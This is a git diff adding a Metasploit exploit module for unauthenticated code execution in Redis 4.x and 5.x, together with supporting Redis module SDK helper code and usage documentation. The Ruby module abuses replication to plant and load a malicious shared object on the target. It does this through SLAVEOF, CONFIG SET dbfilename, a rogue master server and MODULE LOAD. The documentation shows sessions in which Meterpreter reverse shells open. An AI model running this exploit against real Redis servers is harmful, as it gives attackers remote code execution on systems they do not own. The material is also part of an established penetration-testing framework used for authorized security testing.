double, I do: + double d; + long long l; + RMUtil_ParseArgs(argv, argc, 1, "ld", &l, &d); +*/ +int RMUtil_ParseArgs(RedisModuleString **argv, int argc, int offset, const char *fmt, ...); + +/** +Same as RMUtil_ParseArgs, but only parses the arguments after `token`, if it was found. +This is useful for optional stuff like [LIMIT [offset] [limit]] +*/ +int RMUtil_ParseArgsAfter(const char *token, RedisModuleString **argv, int argc, const char *fmt, + ...); + +int rmutil_vparseArgs(RedisModuleString **argv, int argc, int offset, const char *fmt, va_list ap); + +#define RMUTIL_VARARGS_BADARG ((size_t)-1) +/** + * Parse arguments in the form of KEYWORD {len} {arg} .. {arg}_len. + * If keyword is present, returns the position within `argv` containing the arguments. + * Returns NULL if the keyword is not found. + * If a parse error has occurred, `nargs` is set to RMUTIL_VARARGS_BADARG, but + * the return value is not NULL. + */ +RedisModuleString **RMUtil_ParseVarArgs(RedisModuleString **argv, int argc, int offset, + const char *keyword, size_t *nargs); + +/** + * Default implementation of an AoF rewrite function that simply calls DUMP/RESTORE + * internally. To use this function, pass it as the .aof_rewrite value in + * RedisModuleTypeMethods + */ +void RMUtil_DefaultAofRewrite(RedisModuleIO *aof, RedisModuleString *key, void *value); + +// A single key/value entry in a redis info map +typedef struct { + char *key; + char *val; +} RMUtilInfoEntry; + +// Representation of INFO command response, as a list of k/v pairs +typedef struct { + RMUtilInfoEntry *entries; + int numEntries; +} RMUtilInfo; + +/** +* Get redis INFO result and parse it as RMUtilInfo. +* Returns NULL if something goes wrong. +* The resulting object needs to be freed with RMUtilRedisInfo_Free +*/ +RMUtilInfo *RMUtil_GetRedisInfo(RedisModuleCtx *ctx); + +/** +* Free an RMUtilInfo object and its entries +*/ +void RMUtilRedisInfo_Free(RMUtilInfo *info); + +/** +* Get an integer value from an info object. Returns 1 if the value was found and +* is an integer, 0 otherwise. the value is placed in 'val' +*/ +int RMUtilInfo_GetInt(RMUtilInfo *info, const char *key, long long *val); + +/** +* Get a string value from an info object. The value is placed in str. +* Returns 1 if the key was found, 0 if not +*/ +int RMUtilInfo_GetString(RMUtilInfo *info, const char *key, const char **str); + +/** +* Get a double value from an info object. Returns 1 if the value was found and is +* a correctly formatted double, 0 otherwise. the value is placed in 'd' +*/ +int RMUtilInfo_GetDouble(RMUtilInfo *info, const char *key, double *d); + +/* +* Returns a call reply array's element given by a space-delimited path. E.g., +* the path "1 2 3" will return the 3rd element from the 2 element of the 1st +* element from an array (or NULL if not found) +*/ +RedisModuleCallReply *RedisModule_CallReplyArrayElementByPath(RedisModuleCallReply *rep, + const char *path); + +/** + * Extract the module type from an opened key. + */ +typedef enum { + RMUTIL_VALUE_OK = 0, + RMUTIL_VALUE_MISSING, + RMUTIL_VALUE_EMPTY, + RMUTIL_VALUE_MISMATCH +} RMUtil_TryGetValueStatus; + +/** + * Tries to extract the module-specific type from the value. + * @param key an opened key (may be null) + * @param type the pointer to the type to match to + * @param[out] out if the value is present, will be set to it. + * @return a value in the @ref RMUtil_TryGetValueStatus enum. + */ +int RedisModule_TryGetValue(RedisModuleKey *key, const RedisModuleType *type, void **out); + +#endif diff --git a/data/exploits/redis/rmutil/vector.c b/data/exploits/redis/rmutil/vector.c new file mode 100644 index 000000000000..25f7fdc34c5e --- /dev/null +++ b/data/exploits/redis/rmutil/vector.c @@ -0,0 +1,88 @@ +#include "vector.h" +#include + +inline int __vector_PushPtr(Vector *v, void *elem) { + if (v->top == v->cap) { + Vector_Resize(v, v->cap ? v->cap * 2 : 1); + } + + __vector_PutPtr(v, v->top, elem); + return v->top; +} + +inline int Vector_Get(Vector *v, size_t pos, void *ptr) { + // return 0 if pos is out of bounds + if (pos >= v->top) { + return 0; + } + + memcpy(ptr, v->data + (pos * v->elemSize), v->elemSize); + return 1; +} + +/* Get the element at the end of the vector, decreasing the size by one */ +inline int Vector_Pop(Vector *v, void *ptr) { + if (v->top > 0) { + if (ptr != NULL) { + Vector_Get(v, v->top - 1, ptr); + } + v->top--; + return 1; + } + return 0; +} + +inline int __vector_PutPtr(Vector *v, size_t pos, void *elem) { + // resize if pos is out of bounds + if (pos >= v->cap) { + Vector_Resize(v, pos + 1); + } + + if (elem) { + memcpy(v->data + pos * v->elemSize, elem, v->elemSize); + } else { + memset(v->data + pos * v->elemSize, 0, v->elemSize); + } + // move the end offset to pos if we grew + if (pos >= v->top) { + v->top = pos + 1; + } + return 1; +} + +int Vector_Resize(Vector *v, size_t newcap) { + int oldcap = v->cap; + v->cap = newcap; + + v->data = realloc(v->data, v->cap * v->elemSize); + + // If we grew: + // put all zeros at the newly realloc'd part of the vector + if (newcap > oldcap) { + int offset = oldcap * v->elemSize; + memset(v->data + offset, 0, v->cap * v->elemSize - offset); + } + return v->cap; +} + +Vector *__newVectorSize(size_t elemSize, size_t cap) { + Vector *vec = malloc(sizeof(Vector)); + vec->data = calloc(cap, elemSize); + vec->top = 0; + vec->elemSize = elemSize; + vec->cap = cap; + + return vec; +} + +void Vector_Free(Vector *v) { + free(v->data); + free(v); +} + + +/* return the used size of the vector, regardless of capacity */ +inline int Vector_Size(Vector *v) { return v->top; } + +/* return the actual capacity */ +inline int Vector_Cap(Vector *v) { return v->cap; } diff --git a/data/exploits/redis/rmutil/vector.h b/data/exploits/redis/rmutil/vector.h new file mode 100644 index 000000000000..a3b606ff9ffa --- /dev/null +++ b/data/exploits/redis/rmutil/vector.h @@ -0,0 +1,73 @@ +#ifndef __VECTOR_H__ +#define __VECTOR_H__ +#include +#include +#include + +/* +* Generic resizable vector that can be used if you just want to store stuff +* temporarily. +* Works like C++ std::vector with an underlying resizable buffer +*/ +typedef struct { + char *data; + size_t elemSize; + size_t cap; + size_t top; + +} Vector; + +/* Create a new vector with element size. This should generally be used + * internall by the NewVector macro */ +Vector *__newVectorSize(size_t elemSize, size_t cap); + +// Put a pointer in the vector. To be used internall by the library +int __vector_PutPtr(Vector *v, size_t pos, void *elem); + +/* +* Create a new vector for a given type and a given capacity. +* e.g. NewVector(int, 0) - empty vector of ints +*/ +#define NewVector(type, cap) __newVectorSize(sizeof(type), cap) + +/* +* get the element at index pos. The value is copied in to ptr. If pos is outside +* the vector capacity, we return 0 +* otherwise 1 +*/ +int Vector_Get(Vector *v, size_t pos, void *ptr); + +/* Get the element at the end of the vector, decreasing the size by one */ +int Vector_Pop(Vector *v, void *ptr); + +//#define Vector_Getx(v, pos, ptr) pos < v->cap ? 1 : 0; *ptr = +//*(typeof(ptr))(v->data + v->elemSize*pos) + +/* +* Put an element at pos. +* Note: If pos is outside the vector capacity, we resize it accordingly +*/ +#define Vector_Put(v, pos, elem) __vector_PutPtr(v, pos, elem ? &(typeof(elem)){elem} : NULL) + +/* Push an element at the end of v, resizing it if needed. This macro wraps + * __vector_PushPtr */ +#define Vector_Push(v, elem) __vector_PushPtr(v, elem ? &(typeof(elem)){elem} : NULL) + +int __vector_PushPtr(Vector *v, void *elem); + +/* resize capacity of v */ +int Vector_Resize(Vector *v, size_t newcap); + +/* return the used size of the vector, regardless of capacity */ +int Vector_Size(Vector *v); + +/* return the actual capacity */ +int Vector_Cap(Vector *v); + +/* free the vector and the underlying data. Does not release its elements if + * they are pointers*/ +void Vector_Free(Vector *v); + +int __vecotr_PutPtr(Vector *v, size_t pos, void *elem); + +#endif \ No newline at end of file diff --git a/documentation/modules/exploit/linux/redis/redis_unauth_exec.md b/documentation/modules/exploit/linux/redis/redis_unauth_exec.md new file mode 100644 index 000000000000..f35ed92d345b --- /dev/null +++ b/documentation/modules/exploit/linux/redis/redis_unauth_exec.md @@ -0,0 +1,171 @@ +## Description + +This module exploits an unauthenticated code execution vulnerability in Redis 4.x and 5.x + +## Vulnerable Application + +**Vulnerable Application Link** + +- Official Docker Images + +https://hub.docker.com/_/redis/ + +## Vulnerable Application Installation Setup. + +``` +docker pull redis +docker run -p 6379:6379 -d --name redis_slave redis +``` + +## Options + +- CUSTOM + +IF `CUSTOM` set to true, this exploit would generate a source code file, and compile it to a redis module file during running, which is more undetectable. +It's only worked on linux system. + +For other scenarios, such as lack of gcc, or others opreate systems, framework could not compile the source for sucessful exploit, it uses the pre-compiled redis module to accomplish this exploit. + + +## Verification Steps + +### set CUSTOM true (available only on linux) + +``` +msf5 exploit(multi/redis/redis_unanth_rce) > options + +Module options (exploit/multi/redis/redis_unanth_rce): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + CUSTOM true yes Whether compile payload file during exploiting + PASSWORD foobared no Redis password for authentication test + RHOSTS 127.0.0.1 yes The target address range or CIDR identifier + RPORT 6379 yes The target port (TCP) + SRVHOST 172.17.0.1 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 + SRVPORT 6666 yes The local port to listen on. + + +Payload options (linux/x64/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST 172.17.0.1 yes The listen address (an interface may be specified) + LPORT 8080 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Automatic + + +msf5 exploit(multi/redis/redis_unanth_rce) > set verbose false +verbose => false +msf5 exploit(multi/redis/redis_unanth_rce) > exploit + +[*] Started reverse TCP handler on 172.17.0.1:8080 +[*] 127.0.0.1:6379 - Compile redis module extension file +[+] 127.0.0.1:6379 - Payload generate successful! +[*] 127.0.0.1:6379 - Listening on 172.17.0.1:6666 +[*] 127.0.0.1:6379 - Rogue server close... +[*] 127.0.0.1:6379 - Sending command to trigger payload. +[*] Sending stage (3021284 bytes) to 172.17.0.2 +[*] Meterpreter session 4 opened (172.17.0.1:8080 -> 172.17.0.2:49556) at 2019-07-19 11:58:52 -0400 +[!] 127.0.0.1:6379 - This exploit may require manual cleanup of './vxwqrg.so' on the target + +meterpreter > getuid +Server username: uid=999, gid=999, euid=999, egid=999 +meterpreter > + +``` + +### Set CUSTOM false (available on all system) + +``` +msf5 > use exploit/linux/redis/redis_unauth_exec +msf5 exploit(linux/redis/redis_unauth_exec) > options + +Module options (exploit/linux/redis/redis_unauth_exec): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + CUSTOM false yes Whether compile payload file during exploiting + PASSWORD foobared no Redis password for authentication test + RHOSTS yes The target address range or CIDR identifier + RPORT 6379 yes The target port (TCP) + SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 + SRVPORT 6379 yes The local port to listen on. + + +Payload options (linux/x64/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Automatic + + +msf5 exploit(linux/redis/redis_unauth_exec) > set rhosts 172.16.6.226 +rhosts => 172.16.6.226 +msf5 exploit(linux/redis/redis_unauth_exec) > set srvhost 172.16.6.1 +srvhost => 172.16.6.1 +msf5 exploit(linux/redis/redis_unauth_exec) > set srvport 6666 +srvport => 6666 +msf5 exploit(linux/redis/redis_unauth_exec) > set lhost 172.16.6.1 +lhost => 172.16.6.1 +msf5 exploit(linux/redis/redis_unauth_exec) > set lport 9999 +lport => 9999 +msf5 exploit(linux/redis/redis_unauth_exec) > options + +Module options (exploit/linux/redis/redis_unauth_exec): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + CUSTOM true yes Whether compile payload file during exploiting + PASSWORD foobared no Redis password for authentication test + RHOSTS 172.16.6.226 yes The target address range or CIDR identifier + RPORT 6379 yes The target port (TCP) + SRVHOST 172.16.6.1 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 + SRVPORT 6666 yes The local port to listen on. + + +Payload options (linux/x64/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST 172.16.6.1 yes The listen address (an interface may be specified) + LPORT 9999 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Automatic + + +msf5 exploit(linux/redis/redis_unauth_exec) > exploit + +[*] Started reverse TCP handler on 172.16.6.1:9999 +[*] 172.16.6.226:6379 - Listening on 172.16.6.1:6666 +[*] 172.16.6.226:6379 - Rogue server close... +[*] 172.16.6.226:6379 - Sending command to trigger payload. +[*] Sending stage (3021284 bytes) to 172.16.6.226 +[*] Meterpreter session 3 opened (172.16.6.1:9999 -> 172.16.6.226:50362) at 2019-07-19 23:53:13 +0800 +[*] 172.16.6.226:6379 - Command Stager progress - 100.00% done (819/819 bytes) +[!] 172.16.6.226:6379 - This exploit may require manual cleanup of './wfuujx.so' on the target + +meterpreter > getuid +Server username: uid=999, gid=999, euid=999, egid=999 +meterpreter > getpid +Current pid: 173 +``` \ No newline at end of file diff --git a/modules/exploits/linux/redis/redis_unauth_exec.rb b/modules/exploits/linux/redis/redis_unauth_exec.rb new file mode 100644 index 000000000000..4375e4fc0f3f --- /dev/null +++ b/modules/exploits/linux/redis/redis_unauth_exec.rb @@ -0,0 +1,271 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::TcpServer + include Msf::Exploit::CmdStager + include Msf::Exploit::FileDropper + include Msf::Auxiliary::Redis + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Redis Unauthenticated Code Execution', + 'Description' => %q{ + This module can be used to leverage the extension functionality added by Redis 4.x and 5.x + to execute arbitrary code. To transmit the given extension it makes use of the feature of Redis + which called replication between master and slave. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Green-m ' # Metasploit module + ], + 'References' => + [ + [ 'URL', 'https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf'], + [ 'URL', 'https://github.com/RedisLabs/RedisModulesSDK'] + ], + + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Targets' => + [ + ['Automatic', {} ], + ], + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', + 'SRVPORT' => '6379' + }, + 'Privileged' => false, + 'DisclosureDate' => 'Nov 13 2018', + 'DefaultTarget' => 0, + 'Notes' => + { + 'Stability' => [ SERVICE_RESOURCE_LOSS], + 'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, ] + }, + )) + + register_options( + [ + Opt::RPORT(6379), + OptBool.new('CUSTOM', [true, 'Whether compile payload file during exploiting', true]) + ] + ) + + register_advanced_options( + [ + OptString.new('RedisModuleInit', [false, 'The command of module to load and unload. Random string as default.']), + OptString.new('RedisModuleTrigger', [false, 'The command of module to trigger the given function. Random string as default.']), + OptString.new('RedisModuleName', [false, 'The name of module to load at first. Random string as default.']) + ] + ) + deregister_options('URIPATH', 'THREADS', 'SSLCert') + end + + # + # Now tested on redis 4.x and 5.x + # + def check + connect + # they are only vulnerable if we can run the CONFIG command, so try that + return Exploit::CheckCode::Safe unless (config_data = redis_command('CONFIG', 'GET', '*')) && config_data =~ /dbfilename/ + + if (info_data = redis_command('INFO')) && /redis_version:(?\S+)/ =~ info_data + report_redis(redis_version) + end + + Exploit::CheckCode::Vulnerable + ensure + disconnect + end + + def exploit + if check_custom + @module_init_name = datastore['RedisModuleInit'] || Rex::Text.rand_text_alpha_lower(4..8) + @module_cmd = datastore['RedisModuleTrigger'] || "#{@module_init_name}.#{Rex::Text.rand_text_alpha_lower(4..8)}" + else + @module_init_name = "shell" + @module_cmd = "shell.exec" + end + + if srvhost == "0.0.0.0" + fail_with(Failure::BadConfig, "Make sure SRVHOST not be 0.0.0.0, or the slave failed to find master.") + end + + # + # Prepare for payload. + # + # 1. Use custcomed payload, it would compile a brand new file during running, which is more undetectable. + # It's only worked on linux system. + # + # 2. Use compiled payload, it's avaiable on all OS, however more detectable. + # + if check_custom + buf = create_payload + generate_code_file(buf) + compile_payload + end + + connect + + # + # Send the payload. + # + redis_command('SLAVEOF', srvhost, srvport.to_s) + redis_command('CONFIG', 'SET', 'dbfilename', "#{module_file}") + ::IO.select(nil, nil, nil, 2.0) + + # start the rogue server + start_rogue_server + # waiting for victim to receive the payload. + Rex.sleep(1) + redis_command('MODULE', 'LOAD', "./#{module_file}") + redis_command('SLAVEOF', 'NO', 'ONE') + + # Trigger it. + print_status('Sending command to trigger payload.') + pull_the_trigger + + # Clean up + Rex.sleep(2) + register_file_for_cleanup("./#{module_file}") + #redis_command('CONFIG', 'SET', 'dbfilename', 'dump.rdb') + #redis_command('MODULE', 'UNLOAD', "#{@module_init_name}") + + ensure + disconnect + end + + # + # We pretend to be a real redis server, and then slave the victim. + # + def start_rogue_server + socket = Rex::Socket::TcpServer.create({'LocalHost'=>srvhost,'LocalPort'=>srvport}) + print_status("Listening on #{srvhost}:#{srvport}") + rsock = socket.accept() + vprint_status("Accepted a connection") + + # Start negotiation + while true + request = rsock.read(1024) + vprint_status("in<<< "+request.inspect) + response = "" + finish = false + + case + when request.include?("PING") + response = "+PONG\r\n" + when request.include?("REPLCONF") + response = "+OK\r\n" + when request.include?("PSYNC") || request.include?("SYNC") + response = "+FULLRESYNC " + 'Z'*40 + " 1\r\n" + response << "$#{payload_bin.length}\r\n" + response << "#{payload_bin}\r\n" + finish = true + end + + if response.length < 200 + vprint_status("out>>> "+response.inspect) + else + vprint_status("out>>> "+response.inspect[0..100]+ "......" + response.inspect[-100..-1]) + end + + rsock.put(response) + + if finish + print_status("Rogue server close...") + rsock.close() + socket.close() + break + end + end + end + + def pull_the_trigger + if check_custom + redis_command("#{@module_cmd}") + else + execute_cmdstager + end + end + + # + # Parpare command stager for the pre-compiled payload. + # And the command of module is hard-coded. + # + def execute_command(cmd, opts = {}) + redis_command("shell.exec","#{cmd.to_s}") rescue nil + end + + # + # Generate source code file of payload to be compiled dynamicly. + # + def generate_code_file(buf) + template = File.read(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.erb')) + File.open(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.c'), 'wb') { |file| file.write(ERB.new(template).result(binding))} + end + + def compile_payload + make_file = File.join(Msf::Config.data_directory, 'exploits', 'redis', 'Makefile') + vprint_status("Clean old files") + vprint_status(%x|make -C #{File.dirname(make_file)}/rmutil clean|) + vprint_status(%x|make -C #{File.dirname(make_file)} clean|) + + print_status("Compile redis module extension file") + res = %x|make -C #{File.dirname(make_file)} -f #{make_file} && echo true| + if res.include? "true" + print_good("Payload #{} generate successful! ") + else + print_error(res) + fail_with(Failure::BadConfig, "Check config of gcc compiler.") + end + end + + # + # check the environment for compile payload to so file. + # + def check_env + # check if linux + return false unless %x|uname -s 2>/dev/null|.include? "Linux" + # check if gcc installed + return false unless %x|command -v gcc && echo true|.include? "true" + # check if ld installed + return false unless %x|command -v ld && echo true|.include? "true" + + true + end + + def check_custom + return @custom_payload if @custom_payload + + @custom_payload = false + @custom_payload = true if check_env && datastore['CUSTOM'] + + @custom_payload + end + + def module_file + return @module_file if @module_file + @module_file = datastore['RedisModuleName'] || "#{Rex::Text.rand_text_alpha_lower(4..8)}.so" + end + + def create_payload + p = payload.encoded + Msf::Simple::Buffer.transform(p, 'c', 'buf') + end + + def payload_bin + return @payload_bin if @payload_bin + if check_custom + @payload_bin = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.so')) + else + @payload_bin = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'exp', 'exp.so')) + end + @payload_bin + end +end